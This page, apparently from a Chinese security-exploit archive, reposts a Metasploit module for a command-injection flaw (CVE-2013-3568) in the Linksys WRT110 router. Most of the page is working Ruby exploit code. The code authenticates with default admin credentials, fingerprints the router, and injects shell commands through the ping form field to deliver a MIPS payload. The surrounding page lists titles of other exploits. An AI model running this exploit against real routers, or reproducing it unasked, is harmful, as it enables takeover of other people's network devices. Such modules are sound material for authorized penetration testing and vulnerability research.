首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Linksys WRT110 Remote Command Execution Vulnerability
来源:metasploit.com 作者:joev 发布时间:2013-09-22  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
##
  
require 'msf/core'
  
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStagerEcho
  
  def initialize(info = {})
    super(update_info(info,
      'Name'        => 'Linksys WRT110 Remote Command Execution',
      'Description' => %q{
        The Linksys WRT110 consumer router is vulnerable to a command injection
        exploit in the ping field of the web interface.
      },
      'Author'      =>
        [
          'Craig Young', # Vulnerability discovery
          'joev <jvennix[at]rapid7.com>', # msf module
          'juan vazquez' # module help + echo cmd stager
        ],
      'License'     => MSF_LICENSE,
      'References'  =>
        [
          ['CVE', '2013-3568'],
          ['BID', '61151'],
          ['URL', 'http://seclists.org/bugtraq/2013/Jul/78']
        ],
      'DisclosureDate' => 'Jul 12 2013',
      'Privileged'     => true,
      'Platform'       => ['linux'],
      'Arch'           => ARCH_MIPSLE,
      'Targets'        =>
        [
            ['Linux mipsel Payload', { } ]
        ],
      'DefaultTarget'  => 0,
      ))
  
    register_options([
      OptString.new('USERNAME', [ true, 'Valid router administrator username', 'admin']),
      OptString.new('PASSWORD', [ false, 'Password to login with', 'admin']),
      OptAddress.new('RHOST', [true, 'The address of the router', '192.168.1.1']),
      OptInt.new('TIMEOUT', [false, 'The timeout to use in every request', 20])
    ], self.class)
  
  end
  
  def check
    begin
      res = send_request_cgi({
        'uri' => '/HNAP1/'
      })
    rescue ::Rex::ConnectionError
      return Exploit::CheckCode::Safe
    end
  
    if res and res.code == 200 and res.body =~ /<ModelName>WRT110<\/ModelName>/
      return Exploit::CheckCode::Vulnerable
    end
  
    return Exploit::CheckCode::Safe
  end
  
  def exploit
    test_login!
  
    execute_cmdstager
  end
  
  # Sends an HTTP request with authorization header to the router
  # Raises an exception unless the login is successful
  def test_login!
    print_status("#{rhost}:#{rport} - Trying to login with #{user}:#{pass}")
  
    res = send_auth_request_cgi({
      'uri' => '/',
      'method' => 'GET'
    })
  
    if not res or res.code == 401 or res.code == 404
      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - Could not login with #{user}:#{pass}")
    else
      print_good("#{rhost}:#{rport} - Successful login #{user}:#{pass}")
    end
  end
  
  # Run the command on the router
  def execute_command(cmd, opts)
    send_auth_request_cgi({
      'uri' => '/ping.cgi',
      'method' => 'POST',
      'vars_post' => {
         'pingstr' => '& ' + cmd
      }
    })
  
    Rex.sleep(1) # Give the device a second
  end
  
  # Helper methods
  def user; datastore['USERNAME']; end
  def pass; datastore['PASSWORD'] || ''; end
  
  def send_auth_request_cgi(opts={}, timeout=nil)
    timeout ||= datastore['TIMEOUT']
    opts.merge!('authorization' => basic_auth(user, pass))
    begin
      send_request_cgi(opts, timeout)
    rescue ::Rex::ConnectionError
      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Could not connect to the webservice")
    end
  end
end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GLPI install.php Remote Comman
·CA BrightStor ARCserve Tape En
·freeFTPd 1.0.10 PASS Command S
·PCMAN FTP Server Post-Authenti
·A-PDF WAV to MP3 1.0.0 Buffer
·MS13-069 Microsoft Internet Ex
·OpenEMR 4.1.1 Patch 14 SQLi Pr
·MS13-071 Microsoft Windows The
·Western Digital Arkeia Remote
·SolarWinds Server and Applicat
·McKesson ActiveX File/Environm
·Share KM 1.0.19 - Remote Denia
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved